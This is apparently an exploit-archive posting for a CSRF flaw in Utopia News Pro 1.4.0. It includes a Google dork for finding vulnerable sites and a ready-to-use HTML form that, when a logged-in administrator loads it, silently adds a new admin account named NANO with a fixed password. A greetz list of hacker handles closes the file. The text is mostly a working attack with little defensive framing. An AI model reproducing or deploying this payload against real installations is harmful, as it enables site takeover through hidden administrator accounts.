# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Date: 7/4/2012
# Author: Dr.NaNo
# Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1
# Version: 1.4.0
# Tested on: Linux-Red-Hat
# Google Dork: Powered By Utopia News Pro 1.4.0
#
########################################################
# ~ Exploit ~ #
########################################################
<html>
<body>
<form action="http://localhost/{PATh}/upload/users.php" method="post" />
<input type="hidden" name="username" value="NANO" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="password" value="102030" />
<input type="hidden" name="password2" value="102030" />
<input type="hidden" name="email" value="security@security.com" />
<input type="submit" name="submitnew" accesskey="s" value="ThankS !" />
</form>
</body>
</html>
#### ~ Greetz ~ #########################################################
# #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020 #
# #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng #
# #
############################################### ~ All FriendS ~ #########